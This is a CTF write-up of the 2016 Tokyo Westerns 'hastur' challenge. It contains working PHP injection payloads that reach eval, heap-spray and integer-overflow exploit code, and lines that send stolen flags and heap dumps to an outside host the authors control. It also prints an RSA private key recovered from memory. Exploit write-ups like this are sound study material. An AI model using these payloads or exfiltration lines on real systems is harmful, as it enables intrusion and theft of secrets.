---
layout: post
title: "Tokyo Westerns/MMA CTF: Hastur Writeup"
categories: writeups tokyowesterns2016
tags: exploitation
author: niklasb
---

*hastur* was a web/pwnable/forensics, but really actually pwnable challenge in
Tokyo Westerns/MMA CTF 2016. It had three stages with three different flags,
with a combined point value of 850.

It consisted of a [PHP application](https://github.com/kitctf/writeups/blob/master/tokyowesterns2016/hastur/hastur-1333c0c1d2c779e70b1677f2f4ed3841651e7565e9dffeb7caf538bc31ec32ab.7z) that had parts of it unnecessarily implemented
as C extensions. When we started the challenge, we had the [source code](https://github.com/kitctf/writeups/blob/master/tokyowesterns2016/hastur/hastur-b413e443d3e366f943e0eecd5db6172eae881f147e845ad3e3d86e56ce26fa62.c) of the
PHP extension available as a hint.

Apart from the *hastur* PHP extension, there is also an Apache module loaded
called `mod_flag.so`, which basically at Apache startup reads the files
`/flag1` and `/flag2` and puts them into global buffer. Nothing interesting
here other than the file names we might need later.

## Stage 1: Exploiting a trivial global buffer overflow to call "any" PHP function

The *hastur* extension defines two global buffers:

{% highlight c %}
static char handler[32]; // = "hastur_ia_ia_handler";
static char god_name[32]; // = "Hastur";
{% endhighlight %}

The `handler` buffer is set to a constant value during extension activation,
the second one is user-controlled via a POST parameter. By looking at the
compiled module, we can see that the order of the variables in the `.bss` section
is swapped, i.e. `god_name` precedes `handler`. And sure enough, we can
overflow `god_name` via a simple strcpy:

{% highlight c %}
static PHP_FUNCTION(hastur_set_name)   // <- this is called with $_POST['name']
{
    char *str;
    int str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
        return;
    }

    strncpy(god_name, str, str_len + 1);  // <-  does not check dest bounds :)
}
{% endhighlight %}

Ok, so we can set the handler to an arbitrary value. Now this comes in handy
when the following code is executed:

{% highlight c %}
static PHP_FUNCTION(hastur_ia_ia)
{
    // .....
    MAKE_STD_ZVAL(handler_zval);
    MAKE_STD_ZVAL(name_zval);
    MAKE_STD_ZVAL(text_zval);
    ZVAL_STRING(handler_zval, handler, 1);
    ZVAL_STRING(name_zval, god_name, 1);
    params[0] = &text_zval;
    params[1] = &name_zval;

    // note: fill text value argument to hastur_ia_ia
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &text, &text_len) == FAILURE) {
        RETURN_FALSE;
    }

    // ... text is transformed in an uninteresting way

    // note: This is basically call_user_function(handler, text, god_name)
    if (call_user_function_ex(EG(function_table), NULL, handler_zval,
                              &retval_ptr, 2, params, 0, NULL TSRMLS_CC) == SUCCESS) {
        // ...
    }
    // ...
{% endhighlight %}

So our overwritten handler string is used as a function name and called with
two arguments. We verify this is a Bad Thing™ by calling printf via the
following POST parameters:

    name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaprintf&text=foo

And sure enough, the string "foo" appears in the response. Now what? After some
fiddling we figured out that we can read files with `highlight_file`:

    name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaahighlight_file&text=/etc/passwd

But for some reason we could not read `/flag1` this way, which is weird. We did
not investigate this further because we wanted proper code execution anyways.
The payload we used to do that is the following:

    name=}echo 1;#aaaaaaaaaaaaaaaaaaaaaaacreate_function&text=

Basically this results in a call to `create_function('', '}echo 1;#aaa...')` and
broken as PHP is, this of course is equivalent to `eval('echo 1;')`...
Apparently `create_function` is implemented via `eval` by just creating
a function definition on the fly via string concatenation. So now we can do

    name=}eval($_POST[x]);#aaaaaaaaaaaaaaaaaaaaaaacreate_function&
    text=&
    x=echo 1;

And execute arbitrary PHP code. And for some reason we can now use
`echo file_get_contents('/flag1');` to read the `/flag1`. Milestone completed.

## Stage 2: Exploiting a PHP heap buffer overflow with large buffers

One thing to note is that we can also read `/proc/self/maps`, so we know where
the flag is located. Plus, with the `/proc/self/maps` leak, it is easy to allocate
a buffer whose (approximate) location we know:

{% highlight php %}
$payload = str_repeat('a', 1<<26);
echo file_get_contents('/proc/self/maps');
{% endhighlight %}

Output:

    565e4000-5666f000 r-xp 00000000 08:01 401642                             /usr/sbin/apache2
    5666f000-56671000 r--p 0008b000 08:01 401642                             /usr/sbin/apache2
    56671000-56673000 rw-p 0008d000 08:01 401642                             /usr/sbin/apache2
    56673000-56676000 rw-p 00000000 00:00 0
    58133000-58170000 rw-p 00000000 00:00 0                                  [heap]
    58170000-582dc000 rw-p 00000000 00:00 0                                  [heap]
    582dc000-58304000 rw-p 00000000 00:00 0                                  [heap]
    f1b09000-f5b4a000 rw-p 00000000 00:00 0   <- this block was not there before
    f5b4a000-f639b000 r-xp 00000000 08:01 531683                             /usr/lib/apache2/modules/libphp5.so
    f639b000-f63fc000 r--p 00850000 08:01 531683                             /usr/lib/apache2/modules/libphp5.so
    ...
    f73a7000-f73a8000 r-xp 00000000 08:01 271437                             /usr/lib/apache2/modules/mod_flag.so
    f73a8000-f73a9000 r--p 00000000 08:01 271437                             /usr/lib/apache2/modules/mod_flag.so
    f73a9000-f73aa000 rw-p 00001000 08:01 271437                             /usr/lib/apache2/modules/mod_flag.so
    f73aa000-f73ac000 rw-p 00000000 00:00 0

So we know that our block is allocated in the region starting at 0xf1b09000,
and we know the flag 2 is at 0xf73a7000 + 0x2080 (the offset can be found with
a disassembler). Our idea now is to fake a string
[ZVal](http://php.net/manual/en/internals2.variables.intro.php) inside the big
`$payload` string. Later we will exploit the extension module by overwriting a heap
buffer to point to that ZVal, in a way that we can read it after. Because we
didn't want to fix offsets all the time, we did a proper heap spray:

{% highlight php %}
for ($i = 0; $i < (1<<26); $i += 0x1000) {
  // value.str.val = address of flag2
  $payload[$i] = "\x80";
  $payload[$i+1] = "\x90";
  $payload[$i+2] = "\x3a";
  $payload[$i+3] = "\xf7";

  // value.str.len
  $payload[$i+4] = "\x40";
  $payload[$i+5] = "\0";
  $payload[$i+6] = "\0";
  $payload[$i+7] = "\0";

  // refcount__gc
  $payload[$i+8] = "\1";
  $payload[$i+9] = "\0";
  $payload[$i+10] = "\0";
  $payload[$i+11] = "\0";

  // type
  $payload[$i+12] = "\x06";
  // reference flag
  $payload[$i+13] = "\0";
  $payload[$i+14] = "\0";
  $payload[$i+15] = "\0";
}
{% endhighlight %}

The fake ZVal is repeated on the beginning of every page, so with more or less 100%
reliability now, the will be a copy of it at `0xf3011018` (just a random adress
in that range without null bytes).

Enough preparation, where is the actual bug? Well there is only one function
left in the hastur extension, `hastur_ia_ia_handler`, so we figured it would be
in there. This function is called with two parameters, `$text` and `$name`, and
it replaces every occurrence of a dot in `$text` with the sequence `". ia! ia!
$name!"`. Not very sensible, and sure enough vulnerable:

{% highlight c %}
// Note: sizeof(extra) is 1024
snprintf(extra, sizeof(extra), " ia! ia! %s!", name);
// Note: extra_len is at most 1023, because extra has a leading null-byte
extra_len = strlen(extra);

// Note: compute new length
size_t new_len = 0;
char *p = text;
while (*p) {
    new_len++;
    if (*p++ == '.')
        new_len += extra_len;
}

// Note: Allocate result buffer and do the work
char *ns = emalloc(new_len + 1);
p = ns;
for (i = 0; i < text_len; i++) {
    *p++ = text[i];
    if (text[i] == '.') {
        strncpy(p, extra, extra_len);
        p += extra_len;
    }
}
*p = '\0';
{% endhighlight %}

The code creates the replacement sequence `" ia! ia! $name!"` first, in
a stack buffer, then computes the final length of the result, then allocates
a buffer and computes the result. However, when computing the final length, it
does not check for overflows. So if we use the maximum extra_len of 1023 (e.g.
by passing in the name `"a"*1024`), and text is set to exactly 2<sup>22</sup>
dot characters, then the result size will be `2^22 * (1023 + 1) = 0 (mod
2^32)`, and the extension will allocate a one-byte buffer, which is *slightly*
too small.

Now the problem is that even though we get an enormous heap corruption, the
program will not likely survive, because the loop after the allocation will try
to write 2<sup>32</sup> bytes, and trigger a page fault pretty quickly. So our idea
is to have the text buffer *after* the allocated buffer in the heap, and overwrite
itself with non-dots, so that the overwrite is stopped shortly beyond the text buffer.

We also want to overwrite something useful, so the idea is to place something
between destination and text buffer which contains pointers to ZVals.

We realized we could not use the size values from above (with destination size
= 1), because the small destination buffer will be allocated in a different
heap than the large text buffer. So we played with the values a bit and finally
used `extra_len = 512` (i.e. `name = "a"*502`) and a text with `2^23 - 1` dots
and 513 non-dot (payload) characters. The destination size is then computed
as `(2^23 - 1)*513 + 513 + 1 = 2^23 + 1 (mod 2^32)`, so it has about the same
size as the text buffer.  And sure enough, they are both allocated in the same
heap, with a predictable offset from each other (at least on the exact combination
of operating system and PHP version that the contest used).

On a side note, we used a hack of [tsuro's simple heap tracing GDB
script](https://github.com/stephenR/gdb_scripts/blob/master/heap.py) to trace
the allocations. Thanks tsuro!

As for the victim buffer, we needed something large which contains pointers.
After some search, we decided to use [`SplFixedArray`](http://php.net/manual/en/class.splfixedarray.php). It's perfect for our purpose because it has a predictable size
(4 * number of elements), is preallocated as one single chunk, and is basically
just an array of pointers of ZVals. So this is how our final layout looks like:

{% highlight php %}
$name = str_repeat('a', 502);

// number of non-dot characters
$n = 513;
$text = str_repeat('.', (1<<23) - ($n / 513) + $n);

for ($i = 16871; $i < 16871 + 25; ++$i)
  $text[$i] = 'a';

// reliable pointer to our fake ZVal
$text[16871 + 25] ="\x18";
$text[16871 + 26] ="\x10";
$text[16871 + 27] ="\x01";
$text[16871 + 28] ="\xf3";
$i += 4;

for (;$i < 16871 + 513; ++$i)
  $text[$i] = 'a';

// allocated size = 1<<23
$victim = new SplFixedArray(1<<21);
{% endhighlight %}

The text, victim and later the destination buffer will be allocated from top
to bottom in the heap, so we will have the desired order

    [destination] [victim] [text]

The offset 16871 and padding of 25 bytes is carefully chosen so that we overwrite
the beginning of the victim buffer with our fake pointer. We will overwrite
some bytes (at most 512) past the end of the text buffer (and other stuff in
between the buffers), but apparently there is nothing really important in this
heap, so that is not a problem. Time for some action:

{% highlight php %}
hastur_ia_ia_handler($text, $name);
echo $victim[0];
{% endhighlight %}

Now this will not work, because PHP will crash on shutdown while trying to
deallocate the `$victim` array and all of its members (some of which are just
pointers to `0x61616161`). But that's not a problem, we can get the data out
before shutdown:

{% highlight php %}
file_get_contents('https://kitctf.de/win/'. urlencode($data));
{% endhighlight %}

And sure enough:

    40.74.83.38 - - [05/Sep/2016:12:25:38 +0200] "GET /win/TWCTF%7Bd315e24abcc494289a9d6df422e77f67c6476e24_dump_dump_dump%7D%0A%00 HTTP/1.0" 404 541 "-" "-"

Check our Github to look at the [complete final exploit](https://github.com/kitctf/writeups/blob/master/tokyowesterns2016/hastur/flag2.php).

## Flag 3: Dump, Dump, Dump

For flag 3, we had a PCAP with an SSL-encrypted connection to port 31179 on the
same server. Presumably it would contain the flag. So our idea was to execute
our exploit against the SSL-enabled server and dump all of its heap memory,
looking for RSA keys. So we adapted our exploit to send the data back via
a POST request:

{% highlight php %}
$options = [
    'http' => [
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query(['x' => $victim[0]])
    ]
];
$context  = stream_context_create($options);
$result = file_get_contents('http://kitctf.de:4444/', false, $context);
{% endhighlight %}

And used it to dump [three memory regions](https://github.com/kitctf/writeups/blob/master/tokyowesterns2016/hastur/heap_dump.tar.gz) tagged with `[heap]`. First we tried
grepping for the string `BEGIN RSA PRIVATE KEY`, but no such luck. Next we
found a utility called
[*passe-partout*](http://www.hsc.fr/ressources/outils/passe-partout/)
which can extract RSA keys from Apache memory via ptrace. Of
course this is not directly applicable in our scenario, but we [modified it to
read the memory from files](https://github.com/niklasb/apache-ssl-key-extract)
and ran it over our dumps. And it found us the key:

    root@ubu1404:/ctf/tokyo/hastur/dump# ls
    1  2  3
    root@ubu1404:/ctf/tokyo/hastur/dump# ../apache-ssl-key-extract/passe-partout
    found RSA key @ 0x5775eee8
    [X] Key saved to file id_rsa-0.key
    root@ubu1404:/ctf/tokyo/hastur/dump# cat id_rsa-0.key
    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEAugrnYx/J08Ory/ACUAL4Qx6IwB7XyZguLTYfVBZc9fA/sPql
    H0CxlExWyEpKqw3XgHyvBbWdxjk3JFeCj2CnbbjkbDDVfmAja2NTub/pl3K5EIIb
    mKsdhwwYv+yDAefSmweUbpFJd/dq8sS63aY/NrwztsGteMFkE6fhbuYfIdcJQrml
    lxoPRmfZrD05Iexsyd06UO0bW9gNwQAZ2PiZWzHGoDmgC18OjJgp8UUPntGtqH2c
    Ux4XGnSW5nZYYMSuzmFxeYMi3hYdyi8SMf0nC7QATsQijdF+ek+0L4trA76R1gl3
    HYMF/hZJesitMauOGY3x35iX4OvNDxOd/OLqmQIDAQABAoIBAQCADA80L2XnZc6x
    n/DHhzO+Zp6ytMfKzf5CSfUIGBhFgeUkd2788rcGngBA/LklwHIp0idYo6cDDtBA
    KCcJbfnu0AoP2RCoWZ0nRYcT2t34yhJMJXC/BE9fatkCB9QnlJpk77Oe4kqR0m3+
    x57h/ZGWp7RkPiuaaGjsCmljvemBjOY6U66HIJX2owb+vz47FMEZnE0kvtLDaM1p
    718EK1xfqojG8hP39uvU6sIQkRHsE+mVcTaombJl9iwwMedvhWg83mqQh/T8yVsZ
    hS84idwo0GeMgoCleUIe4EiES2wyTyrrhMNb68dUDSv6av5EUsB/iivCFvbCbQeb
    A109gvIxAoGBANxUXce6OLegQdUyyxKkBb/WVnfXu77kgerWOa/BwM+cwRmND+PY
    e3nMOOS5fkkFRaFqLHM+KaUQKk5tR8fDz1tJDUdlR95UxW31h5D61crE/I8kWsc0
    tl3D6rbOaJxNVTT4A68T5GsiBHokq6BCD1d1Gf9PmBVvyAuru2TvyhA1AoGBANgp
    gK2WyGYEkfFfTzIbhKkXBhJNoPE2E9wyjwRlWseKrOadbYRRkKueWEXRT+hVYArx
    FmE9rfIbfqYsCpod8xX5q66iQs6wM3cCZAUlsKq+/2dr58IhLO2ZX7iEP/5EqFdg
    EgM3edgO8lb1Op8B6cqam6Ur3e4i0geR2soe4IVVAoGAYVISqmojK1jqO1XYRT+W
    Gop+Xyk3kLY2fJhrmqqmlA3VbYfVgPrab445gy48Ddz6SLYxNCY9Ft/xD/tNPXvM
    V7II34RpHlerbUqKuwtQ6+Pe+ws/3cX216v2PREnPAMco+z5E5hhyMCZ4anY9Uy4
    ohTjitaJgs6BOkZ827TfOBECgYBbYvh26ydgEhCNZkj6Gy4zunsjo9QmBkHRN0LF
    jgAaGmPMv8O8TCuIktIo+jv5Mpb/KTvX8pamo78gi8ATthO+N6bAlvL9pPqtFsKo
    dm3BUixyUelSZmozLUONo8PWQLqW7hPPblXB5VfJMbYN4WYw9LpW0zvpYKlA8AX6
    q6EqXQKBgGfsJ2L3pCsvOCwF3XWSjETdDzOThRXL+dWpXwDlvFt53RBK4UFoOiJ8
    R77zss8Y4bV8LJShC8bb1yhdHXg+4z5gQlRg7IUIOxbsNdo7D6MKCak1oZ3wCn3c
    lCE8odc/V4JX9TGTgcn/Ah1XkNR81nnI/prr0FwrNvNWPNijKdf3
    -----END RSA PRIVATE KEY-----

Note that we built and ran it on the same OS as the contest was using to run
Apache, in order to have the same struct definitions as Apache. From here it is
easy to decrypt the SSL stream using Wireshark:

    GET /flag3 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
    Host: hastur.chal.ctf.westerns.tokyo:31179
    Accept: */*

    HTTP/1.1 200 OK
    Date: Wed, 31 Aug 2016 15:46:05 GMT
    Server: Apache/2.4.7 (Ubuntu)
    Last-Modified: Wed, 31 Aug 2016 15:45:47 GMT
    ETag: "30-53b5ffdac8851"
    Accept-Ranges: bytes
    Content-Length: 48

    TWCTF{955a0860d548ebb9946522e63e2a230937ca90bf}
